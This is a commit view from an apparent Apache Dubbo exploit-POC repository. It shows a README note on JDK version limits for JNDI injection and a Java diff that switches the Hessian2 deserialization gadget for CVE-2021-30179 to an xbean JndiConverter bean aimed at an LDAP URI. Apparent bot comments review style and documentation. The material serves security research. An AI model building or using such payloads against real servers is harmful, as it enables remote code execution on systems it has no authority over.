Merge remote-tracking branch 'origin/main' into main
lz2y committed Mar 27, 2023
2 parents d000035 + 89a3a72 commit 00b6f0f
Showing 2 changed files with 9 additions and 4 deletions.
7 changes: 7 additions & 0 deletions README.md
Expand Up @@ -10,8 +10,15 @@ Apache Dubbo 漏洞POC
- [ ] others
* 免责声明
* 项目仅供学习使用,任何未授权检测造成的直接或者间接的后果及损失,均由使用者本人负责
* 注意事项
* 需要用到JNDI注入的POC请于低版本的JDK版本测试(项目在8u71中测试)
> * 基于RMI的利用方式,JDK版本限制于6u132、7u131、8u121之前,在8u122及之后的版本中,加入了反序列化白名单的机制,关闭了RMI远程加载代码
> * 基于LDAP的利用方式,JDK版本限制于6u211、7u201、8u191、11.0.1之前,在8u191版本中,Oracle对LDAP向量设置限制,发布了CVE-2018-3149,关闭JNDI远程类加载
> * From:https://www.freebuf.com/vuls/279465.html
* 参考链接

* [GHSL-2021-034_043: Multiple pre-auth RCEs in Apache Dubbo](https://securitylab.github.com/advisories/GHSL-2021-034_043-apache-dubbo/)
* [dubbo源码浅析:默认反序列化利用之hessian2](https://www.anquanke.com/post/id/197658)
* 分析文章
* https://mp.weixin.qq.com/s/vHJpE2fZ8Lne-xFggoQiAg
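Review bot: the RMI bullet in the new 注意事项 block gives two different version boundaries: it limits the technique to JDK versions before 8u121 ("8u121之前") and then says the restriction was added in 8u122 and later ("在8u122及之后的版本中"), which leaves 8u121 itself unaccounted for. Please make the two halves of that sentence agree, ideally by checking the cited freebuf article against the JDK release notes. Two smaller points in the same block: the nested items are written as `> *`, which renders as a blockquote rather than as sub-bullets of the JDK note, and `From:https://...` has no space after the colon, so plain indentation and `From: https://...` would be more consistent with the rest of the list. The note also states the project was tested on 8u71 without saying which of the POCs that covers; a short list of which POCs need the JNDI path would help readers who use this README to judge whether a given JDK level is already outside the affected range.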
6 changes: 2 additions & 4 deletions src/main/java/top/lz2y/vul/CVE202130179.java
Expand Up @@ -86,10 +86,8 @@ private static void getRawReturnPayload(Hessian2ObjectOutput out, String ldapUri
}

private static void getBeanPayload(Hessian2ObjectOutput out, String ldapUri) throws IOException {
// JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
// javaBeanDescriptor.setProperty("asText",ldapUri);
JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("com.sun.rowset.JdbcRowSetImpl",7);
javaBeanDescriptor.setProperty("AutoCommit",ldapUri);
JavaBeanDescriptor javaBeanDescriptor = new JavaBeanDescriptor("org.apache.xbean.propertyeditor.JndiConverter",7);
javaBeanDescriptor.setProperty("asText",ldapUri);
out.writeObject(new Object[]{javaBeanDescriptor});
HashMap map = new HashMap();
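Review bot: in `getBeanPayload`, the bean class passed to `new JavaBeanDescriptor(...)` changes from `com.sun.rowset.JdbcRowSetImpl` to `org.apache.xbean.propertyeditor.JndiConverter` (and the property from `AutoCommit` to `asText`) inside a merge commit whose message is only the default "Merge remote-tracking branch" text, so the behaviour change is undocumented. The previous variant is deleted rather than left selectable, and the README hunk in the same commit does not mention which class the POC now uses; please record the reason in the commit message or a comment above these lines, or make the class and property name parameters of the method. Separately, the literal `7` as the second constructor argument is a magic number; Dubbo's `JavaBeanDescriptor.TYPE_BEAN` constant would say what it means. The context line `HashMap map = new HashMap();` uses a raw type and would be cleaner with type parameters.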
